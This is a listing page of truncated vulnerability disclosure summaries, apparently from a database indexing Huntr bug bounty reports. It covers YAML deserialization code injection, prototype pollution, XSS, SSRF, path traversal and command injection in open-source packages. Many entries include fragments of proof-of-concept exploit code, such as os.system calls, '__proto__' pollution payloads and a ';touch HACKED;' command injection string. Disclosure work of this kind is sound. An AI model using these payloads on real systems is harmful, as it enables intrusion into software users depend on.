Lucene search
K

4072 matches found

Huntr
Huntr
added 2021/02/19 12:0 a.m.11 views

Code Injection in dimodimchev/access-control

Description Access-Control package is vulnerable to Arbitary Code Execution due to insecure yaml desearilization. Vulnerability Vulnerable to YAML deserialization attack caused by unsafe loading. Proof of Concept steps to reproduce: python import os os.system'git clone...

1.3AI score
Exploits0
Huntr
Huntr
added 2021/02/19 12:0 a.m.18 views

Path Traversal in mucommander/mucommander

:book: Description mucommander A lightweight, cross-platform file manager with a dual-pane interface. This package is vulnerable for zip-slip. https://github.com/mucommander/mucommander https://www.mucommander.com/ :recycle: Steps To Reproduce-: 0 download and run latest release from...

1.2AI score
Exploits0
Huntr
Huntr
added 2021/02/19 12:0 a.m.7 views

Cross-site Scripting (XSS) - Generic in prasathmani/tinyfilemanager

:book: Description TinyFileManager is web based file manager and it is a simple, fast and small file manager with a single file, multi-language ready web application for storing, uploading, editing and managing files and folders online via web browser. The Application runs on PHP 5.5+, It allows...

7.2AI score
Exploits0
Huntr
Huntr
added 2021/02/18 12:0 a.m.16 views

Code Injection in ngockhanh5110/nlp-vietnamese-text-summarization

Description nlp-vietnamese-text-summarization package is vulnerable to Arbitary Code Execution due to insecure yaml desearilization. Vulnerability Vulnerable to YAML deserialization attack caused by unsafe loading. Proof of Concept steps to reproduce: python import os...

2.7AI score
Exploits0
Huntr
Huntr
added 2021/02/18 12:0 a.m.15 views

Code Injection in xdf8/deepfriedbot

Description DeepFriedBot is a telegram bot that sends random deep fried memes, package is vulnerable to Arbitary Code Execution. Vulnerability Vulnerable to YAML deserialization attack caused by unsafe loading. Proof of Concept python import os os.system'https://github.com/xdf8/DeepFriedBot'...

2.6AI score
Exploits0
Huntr
Huntr
added 2021/02/18 12:0 a.m.16 views

Server-Side Request Forgery (SSRF) in sebhildebrandt/systeminformation

Description systeminformation package is vulnerable to Server-side request forgery. It allows attackers to abuse of @ to make requests to a different domain or possibility to applications that are not publicly exposed through http://[email protected]:8080. Proof of Concept javascript cons...

1.9AI score
Exploits0
Huntr
Huntr
added 2021/02/14 12:0 a.m.21 views

Code Injection in adobe/himl

Description himl is a hierarchical config using yaml in Python, which is vulnerable to Arbitary Code Execution. Vulnerability Vulnerable to YAML deserialization attack caused by unsafe loading. Proof of Concept Installation bash pip install himl Run exploit.py import os os.system'pip install himl...

1.6AI score
Exploits0References1
Huntr
Huntr
added 2021/02/14 12:0 a.m.8 views

Code Injection in adobe/ops-cli

Description ops-cli is a wrapper for Terraform, Ansible, Helmfile and SSH for cloud automation , which is vulnerable to Arbitary Code Execution. Vulnerability Vulnerable to YAML deserialization attack caused by unsafe loading. Proof of Concept Installation bash pip install ops-cli Run exploit.py...

1.8AI score
Exploits0References1
Huntr
Huntr
added 2021/02/14 12:0 a.m.16 views

Cross-site Scripting (XSS) - Generic in ciur/papermerge-js

Description Papermerge is an open source document management system DMS primarily designed for archiving and retrieving your digital documents. Instead of having piles of paper documents all over your desk, office or drawers - you can quickly scan them and configure your scanner to directly uploa...

6.2AI score
Exploits0
Huntr
Huntr
added 2021/02/14 12:0 a.m.19 views

Prototype Pollution in trenskow/keyd

Description keyd is vulnerable to Prototype Pollution. This package fails to restrict access to prototypes of objects, allowing for modification of prototype behavior using a proto payload, which may result in Sensitive Information Disclosure/Denial of ServiceDoS/Remote Code Execution. Proof of...

2.1AI score
Exploits0
Huntr
Huntr
added 2021/02/13 12:0 a.m.29 views

Code Injection in unix121/i3wm-themer

Description i3wm-themer is the theme collection manager for i3-wm which is vulnerable to Arbitrary Code Execution. Vulnerability Vulnerable to YAML deserialization attack caused by unsafe loading. Proof of Concept Installation bash git clone https://github.com/unix121/i3wm-themer cd i3wm-themer/...

0.9AI score
Exploits0References1
Huntr
Huntr
added 2021/02/13 12:0 a.m.19 views

Code Injection in heartexlabs/label-studio

Description Label Studio is a swiss army knife of data labeling and annotation tools which is vulnerable to Arbitrary Code Execution. Vulnerability Vulnerable to YAML deserialization attack caused by unsafe loading. Proof of Concept Installation bash pip3 install label-studio Run exploit.py impor...

2AI score
Exploits0References1
Huntr
Huntr
added 2021/02/13 12:0 a.m.19 views

Prototype Pollution in elcharitas/js-dot

Description Prototype Pollution in js-dot Proof of Concept 1. Create the following PoC file: // poc.js var jsDot = require"js-dot" var obj = console.log"Before : " + .polluted; jsDot.setobj,"proto.polluted","Yes! Its Polluted"; console.log"After : " + .polluted; 2. Execute the following commands ...

2.1AI score
Exploits0
Huntr
Huntr
added 2021/02/13 12:0 a.m.16 views

Prototype Pollution in allain/propper

Description Prototype Pollution in propper Proof of Concept 1. Create the following PoC file: // poc.js var propper = require"propper" var obj = console.log"Before : " + .polluted; propperobj,"proto.polluted","Yes! Its Polluted"; console.log"After : " + .polluted; 2. Execute the following command...

2.1AI score
Exploits0
Huntr
Huntr
added 2021/02/12 12:0 a.m.38 views

Command Injection in sebhildebrandt/systeminformation

Description systeminformation is vulnerable to Command Injection vulnerability. It is possible to send an array containing OS commands, which bypass the filters. Proof of Concept 1. Create a Javascript file with the content below: javascript const si = require'systeminformation'; const command =...

7.5CVSS2AI score0.01854EPSS
Exploits0
Huntr
Huntr
added 2021/02/12 12:0 a.m.62 views

Cross-site Scripting (XSS) - Generic in ciur/papermerge-js

:star2: Description - Papermerge is an open source document management system DMS primarily designed for archiving and retrieving your digital documents. Instead of having piles of paper documents all over your desk, office or drawers. In The Admin Upload Function. Users Are Able To Trigger...

1.6AI score
Exploits0
Huntr
Huntr
added 2021/02/11 12:0 a.m.33 views

Denial of Service in sebhildebrandt/systeminformation

Description systeminformation is vulnerable to Denial of Service. It is possible to overwrite the ping command parameters, which results in too long execution. Proof of Concept Create a .js file with the content below and run it. javascript const si = require'systeminformation'; si.inetLatency"-c...

4.6CVSS4.3AI score0.9024EPSS
Exploits4
Huntr
Huntr
added 2021/02/09 12:0 a.m.6 views

Prototype Pollution in borderlesslabs/assign

Description @borderlesslabs/assign is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: // poc.js var a = require"@borderlesslabs/assign" const payload = JSON.parse'"proto":"polluted":"Yes! Its Polluted"'; var obj = console.log"Before : " + .polluted;...

2AI score
Exploits0
Huntr
Huntr
added 2021/02/07 12:0 a.m.15 views

Prototype Pollution in sttk/fav-prop.set-deep

Description @fav/prop.set-deep is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: javascript // poc.js var setDeep = require"@fav/prop.set-deep" var obj = ; console.log"Before: " + .polluted; setDeepobj, "proto", "polluted", "Yes, its polluted"...

1.5AI score
Exploits0
Huntr
Huntr
added 2021/02/07 12:0 a.m.34 views

Path Traversal in rust-compress/rc-zip

:book: Description rc-zip Pure rust zip & zip64 reading and writing. this package is vulnerable for zip-slip https://github.com/rust-compress/rc-zip https://crates.io/crates/rc-zip :recycle: Steps To Reproduce-: 0 download and run latest release from https://github.com/rust-compress/rc-zip 1 run ...

0.6AI score
Exploits0
Huntr
Huntr
added 2021/02/06 12:0 a.m.39 views

Cross-site Scripting (XSS) - Generic in ciur/papermerge

:book: Description Papermerge is an open source document management system DMS primarily designed for archiving and retrieving your digital documents. Instead of having piles of paper documents all over your desk, office or drawers - you can quickly scan them and configure your scanner to directl...

4.3CVSS6.2AI score0.01527EPSS
Exploits0
Huntr
Huntr
added 2021/02/06 12:0 a.m.13 views

Cross-site Scripting (XSS) - Generic in rilyzhang/dy-server

Description Cross Site Scripting in dy-server2 Proof of Concept 1. Install package from npm: npm i -g dy-server2 2. Create folder or file with name: 3. Start server: dy-server2 -p 8888 4. Open website and the code will execute...

1.4AI score
Exploits0
Huntr
Huntr
added 2021/02/04 12:0 a.m.5 views

Command Injection in totaljs/framework

Description Command Injection in total.js Proof of Concept 1. Create the following PoC file: // poc.js const total = require'total.js'; let image = Image.load""; let payload = ";touch HACKED;"; image.pipenull,payload; 2. Execute the following commands in terminal: npm i total.js Install affected...

1.2AI score
Exploits0
Huntr
Huntr
added 2021/02/04 12:0 a.m.9 views

Prototype Pollution in kettek/dot-dotty

Description dot-dotty is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: // poc.js const DotDotty = require'dot-dotty' let obj = a: 1 let dot = DotDottyobj console.log"Before : " + .polluted; dot'proto.polluted' = 'Yes! Its Polluted'; console.log"After : " +...

2AI score
Exploits0
Huntr
Huntr
added 2021/01/30 12:0 a.m.22 views

Code Injection in ewels/multiqc

Description MultiQC Aggregate results from bioinformatics analyses across many samples into a single report. Vulnerability Vulnerable to YAML deserialization attack caused by unsafe loading. Proof of Concept Installation bash pip3 install multiqc Run exploit.py import os os.system'pip3 install...

2.4AI score
Exploits0References1
Huntr
Huntr
added 2021/01/30 12:0 a.m.16 views

Code Injection in nosarthur/gita

✍️ Description gita helps to Manage multiple git repos with sanity. Vulnerability description Vulnerable to YAML deserialization attack caused by unsafe loading. 🕵️‍♂️ Proof of Concept vulnerable part of code yaml.load in getcmdsfromfiles...

0.9AI score
Exploits0
Huntr
Huntr
added 2021/01/30 12:0 a.m.11 views

Code Injection in tensorspeech/tensorflowtts

✍️ Description TensorFlowTTS provides real-time state-of-the-art speech synthesis architectures such as Tacotron-2, Melgan, Multiband-Melgan, FastSpeech, FastSpeech2 based-on TensorFlow 2. With Tensorflow 2, we can speed-up training/inference progress, optimizer further by using fake-quantize awar...

1.6AI score
Exploits0References1
Huntr
Huntr
added 2021/01/30 12:0 a.m.60 views

Prototype Pollution in tandrewnichols/safe-obj

Description safe-obj is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: javascript // poc.js var safeObj = require"safe-obj" var obj = ; console.log"Before: " + .polluted safeObj.expandobj, "proto.polluted", true console.log"After: " + .polluted 2. Execute th...

7.5CVSS1.8AI score0.03327EPSS
Exploits1
Huntr
Huntr
added 2021/01/28 12:0 a.m.30 views

Prototype Pollution in geta/nestedobjectassign

Description nested-object-assign is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: javascript // poc.js const assign = require'nested-object-assign' console.log'Before: ' + .polluted assign, JSON.parse'"proto": "polluted": true' console.log'After: ' +...

5CVSS1.7AI score0.0152EPSS
Exploits1
Huntr
Huntr
added 2021/01/28 12:0 a.m.10 views

Prototype Pollution in fabiospampinato/plain-object-merge

Description plain-object-merge is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: javascript // poc.js const merge = require'plain-object-merge' console.log'Before: ' + .polluted merge, JSON.parse'"proto": "polluted": true' console.log'After: ' + .polluted 2...

1.7AI score
Exploits0
Huntr
Huntr
added 2021/01/28 12:0 a.m.8 views

Code Injection in tensorflow/tfx

Description TensorFlow Extended TFX is a Google-production-scale machine learning platform based on TensorFlow. It provides a configuration framework to express ML pipelines consisting of TFX components. Vulnerability Vulnerable to YAML deserialization attack caused by unsafe loading. Proof of...

2.5AI score
Exploits0References1
Huntr
Huntr
added 2021/01/28 12:0 a.m.23 views

Server-Side Request Forgery (SSRF) in sterlp/svg2png

:book: Description Svg2Png Manage your Icons in SVG and generate the needed PNG into your projects as needed. No "Web Service" needed, just an executable JAR file. this package is vulnerable to XXE. https://github.com/sterlp/svg2png :recycle: Steps To Reproduce-: 0 download and run latest release...

4.3CVSS0.5AI score0.007EPSS
Exploits1
Huntr
Huntr
added 2021/01/27 12:0 a.m.9 views

Prototype Pollution in fedeghe/objwun

Description objwun is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: javascript // poc.js const set = require'objwun' console.log'Before: ' + .polluted set, 'proto.polluted', true console.log'After: ' + .polluted 2. Execute the following commands in the...

2AI score
Exploits0
Huntr
Huntr
added 2021/01/26 12:0 a.m.44 views

Prototype Pollution in grpc/grpc-node

Description grpc native core package is vulnerable to Prototype Pollution. This package allowing for modification of prototype behavior, which may result in Information Disclosure/DoS/RCE. Proof of Concept 1. Create the following PoC file: js // poc.js var grpc =require'grpc'...

5CVSS2.1AI score0.03554EPSS
Exploits0References1
Huntr
Huntr
added 2021/01/26 12:0 a.m.10 views

Prototype Pollution in a-maged/object-breacher

Description object-breacher is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: javascript // poc.js const set = require'object-breacher' console.log'Before: ' + .polluted set, 'proto.polluted', true console.log'After: '+ .polluted 2. Execute the following...

1.6AI score
Exploits0
Huntr
Huntr
added 2021/01/26 12:0 a.m.4 views

Prototype Pollution in thi-ng/umbrella

Description @thi.ng/paths is vulnerable to Prototype Pollution. The vulnerability is due to an incomplete fix. mutIn function does not have fix implemented. Proof of Concept 1. Create the following PoC file: javascript // poc.js const paths = require'@thi.ng/paths' console.log"Before: ", .pollute...

1.8AI score
Exploits0
Huntr
Huntr
added 2021/01/26 12:0 a.m.10 views

Prototype Pollution in alexandervu/dot-prop-opt

Description dot-prop-opt is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: javascript // poc.js const set = require'dot-prop-opt' console.log'Before: ' + .polluted set, 'proto.polluted', true console.log'After: ' + .polluted 2. Execute the following commands...

1.6AI score
Exploits0
Huntr
Huntr
added 2021/01/26 12:0 a.m.8 views

Prototype Pollution in yomguithereal/baobab

Description baobab is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: javascript // poc.js const Baobab = require'baobab'; console.log'Before: ' + .polluted tree = new Baobab tree.deepMergeJSON.parse'"proto": "polluted": true' console.log'After: ' + .polluted...

1.7AI score
Exploits0
Huntr
Huntr
added 2021/01/26 12:0 a.m.13 views

Prototype Pollution in cronvel/tree-kit

Description tree-kit is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: javascript // poc.js const dotPath = require'tree-kit' console.log"Before: ", .polluted dotPath.set, 'proto.polluted', true console.log"After: ", .polluted 2. Execute the following comman...

1.6AI score
Exploits0
Huntr
Huntr
added 2021/01/26 12:0 a.m.13 views

Cross-site Scripting (XSS) - Generic in frappe/charts

Description frappe-charts is vulnerable to Cross-Site Scripting XSS due to an incomplete fix https://github.com/frappe/charts/commit/d5706a501b44fce6949216b635ed6c5e785c471d. Steps To Reproduce 1. Open the following codesandbox...

0.1AI score
Exploits0
Huntr
Huntr
added 2021/01/26 12:0 a.m.12 views

Code Injection in tensorlayer/tensorlayer

Description TensorLayer is a novel TensorFlow-based deep learning and reinforcement learning library designed for researchers and engineers. It provides an extensive collection of customizable neural layers to build advanced AI models quickly. This package is vulnerable to Arbitrary Code Executio...

2.8AI score
Exploits0
Huntr
Huntr
added 2021/01/11 12:0 a.m.22 views

Prototype Pollution in js-data/js-data

Description js-data is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: // poc.js const js = require"js-data"; const payload = JSON.parse'"proto":"polluted":"Yes! Its Polluted"'; var obj = console.log"Before : " + .polluted; js.utils.deepMixInobj, payload;...

7.5CVSS2AI score0.01959EPSS
Exploits1
Huntr
Huntr
added 2021/01/10 12:0 a.m.7 views

Prototype Pollution in indlekofer/object_set

Description Prototype Pollution in @indlekofer/objectset Proof of Concept 1. Create the following PoC file: // poc.js var objectSet = require"@indlekofer/objectset" var obj = console.log"Before : " + .polluted; objectSet.defaultobj,"proto","polluted","Yes! Its Polluted"; console.log"After : " +...

2AI score
Exploits0
Huntr
Huntr
added 2021/01/10 12:0 a.m.11 views

Prototype Pollution in danieldelcore/object-deep-key

Description object-deep-key is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: javascript // poc.js const objDeepKey = require'object-deep-key'.default console.log'Before: ', .toString objDeepKeyconstructor.prototype, 'toString'.set'function prototype pollute...

2.1AI score
Exploits0
Huntr
Huntr
added 2021/01/10 12:0 a.m.45 views

Prototype Pollution in dominictarr/libnested

Description libnested is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: // poc.js var libnested = require"libnested" var obj = console.log"Before : " + .polluted; libnested.setobj, 'proto','polluted', 'Yes! Its Polluted'; console.log"After : " + .polluted; 2...

7.5CVSS2AI score0.0322EPSS
Exploits1
Huntr
Huntr
added 2021/01/10 12:0 a.m.9 views

Prototype Pollution in xiaoyifan6/json-glat

Description json-glat is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: // poc.js var jsonGlat = require"json-glat" console.log"Before : " + .polluted; jsonGlat.parse'proto.polluted': 'Yes! Its Polluted'; console.log"After : " + .polluted; 2. Execute the...

2AI score
Exploits0
Huntr
Huntr
added 2021/01/10 12:0 a.m.39 views

Prototype Pollution in lukeed/dset

Description dset is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: // poc.js var dset = require"dset" var obj = console.log"Before : " + .polluted; dsetobj, 'proto.polluted', 'Yes! Its Polluted'; console.log"After : " + .polluted; 2. Execute the following...

7.5CVSS1.8AI score0.02944EPSS
Exploits1
Huntr
Huntr
added 2021/01/10 12:0 a.m.16 views

Prototype Pollution in babak-gholamzadeh/deeply-object-assign

Description deeply-object-assign is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: // poc.js var deeplyObjectAssign = require"deeply-object-assign" const payload = JSON.parse'"proto":"polluted":"Yes! Its Polluted"'; var obj = console.log"Before : " +...

2AI score
Exploits0
Huntr
Huntr
added 2021/01/10 12:0 a.m.14 views

Prototype Pollution in quernest/arr-flatten-unflatten

Description arr-flatten-unflatten is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: // poc.js var arrFlattenUnflatten = require"arr-flatten-unflatten" console.log"Before : " + .polluted; arrFlattenUnflatten.unflatten'protopolluted': 'Yes! Its Polluted';...

7.5CVSS2.1AI score0.01916EPSS
Exploits1
Huntr
Huntr
added 2021/01/10 12:0 a.m.15 views

Prototype Pollution in allgay/jsonuri

Description jsonuri is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: // poc.js const set = require'jsonuri' var obj = console.log"Before : " + .polluted; set, 'proto/polluted', 'Yes! Its Polluted'; console.log"After : " + .polluted; 2. Execute the following...

1.8AI score
Exploits0
Total number of security vulnerabilities4072